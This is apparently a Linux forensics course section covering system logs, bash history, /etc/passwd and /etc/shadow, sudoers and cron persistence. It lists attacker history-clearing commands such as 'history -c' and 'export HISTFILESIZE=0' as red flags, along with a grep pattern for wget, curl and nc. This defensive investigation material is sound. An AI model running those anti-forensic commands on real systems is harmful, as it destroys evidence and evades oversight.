Linux Forensics

Log Files, Shell Artifacts & User Analysis

Section 5 of 12

Linux File System Hierarchy

/var (Variable Data)

  • /var/log - System and application logs
  • /var/spool - Print/email queues
  • /var/tmp - Temporary files (persistent)
  • /var/cache - Application cache

/etc (Configuration)

  • /etc/passwd - User accounts
  • /etc/shadow - Password hashes
  • /etc/group - Group information
  • /etc/sudoers - Sudo privileges

/home (User Directories)

  • .bash_history - Command history
  • .bashrc - Shell configuration
  • .ssh/ - SSH keys and config
  • .mozilla/ - Browser data

/tmp (Temporary)

  • Cleared on reboot - Usually
  • World-writable - Security risk
  • Common malware location
  • Check for persistence

Critical Log Files (/var/log)

auth.log / secure

Authentication attempts, sudo usage, SSH logins

# View failed login attempts

grep "Failed password" /var/log/auth.log

# Check sudo usage

grep "sudo" /var/log/auth.log

syslog / messages

General system messages, kernel logs, service status

# View recent system messages

tail -f /var/log/syslog

# Search for errors

grep -i "error" /var/log/syslog

btmp / wtmp / lastlog

Login records - binary format requiring special tools

btmp

Failed logins

lastb

wtmp

All logins

last

lastlog

Last login per user

lastlog

Bash History & Shell Artifacts

.bash_history

Records of commands executed by users. Golden artifact for understanding user actions and attacker behavior.

Location

/home/[username]/.bash_history
/root/.bash_history

Important Notes

  • • Not written until logout
  • • Can be cleared by attackers
  • • Check for gaps/anomalies

What to Look For

🚩 Red Flags

  • • history -c (clear history)
  • • rm ~/.bash_history
  • • export HISTFILESIZE=0
  • • Commands starting with space
  • • Downloading tools (wget, curl)

🔍 Investigate

  • • SSH connections made
  • • File modifications/deletions
  • • Network connections
  • • Privilege escalation attempts
  • • Data exfiltration commands

Analysis Commands

# View history with timestamps (if enabled)

export HISTTIMEFORMAT='%F %T '

history

# Search for specific commands

grep -i "wget\|curl\|nc\|bash" ~/.bash_history

User Account Analysis

/etc/passwd

User account information (world-readable)

username:x:UID:GID:comment:home:shell

root:x:0:0:root:/root:/bin/bash

john:x:1001:1001:John Doe:/home/john:/bin/bash

  • • Check for UID 0 (root equivalent)
  • • Look for unusual shells
  • • Verify legitimate users

/etc/shadow

Password hashes (root-only)

username:$6$hash...:last:min:max:warn

root:$6$random$longhash...

  • • $6$ = SHA-512 hash
  • • Check for weak passwords
  • • Look for accounts with no password
  • • Verify password change dates

Sudoers Analysis

Check who has sudo privileges and what they can execute

# View sudoers file (carefully!)

cat /etc/sudoers

# Check user's sudo privileges

sudo -l -U username

# Review sudo logs

grep sudo /var/log/auth.log

Cron Jobs & Scheduled Tasks

Cron jobs automate tasks on Linux. Common persistence mechanism for attackers.

System Cron Locations

/etc/crontab

System-wide crontab

/etc/cron.d/

Additional cron files

/etc/cron.{hourly,daily,weekly,monthly}/

Scheduled scripts

/var/spool/cron/crontabs/

User crontabs

Cron Syntax

# Min Hour Day Month Weekday Command

* * * * * /path/to/command

# Run every day at 2 AM

0 2 * * * /backup.sh

Check for:

  • • Unusual scripts or commands
  • • Network connections
  • • Downloads (wget/curl)
  • • Reverse shells

Cron Analysis Commands

# List user's cron jobs

crontab -l

# List all user cron jobs (as root)

for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done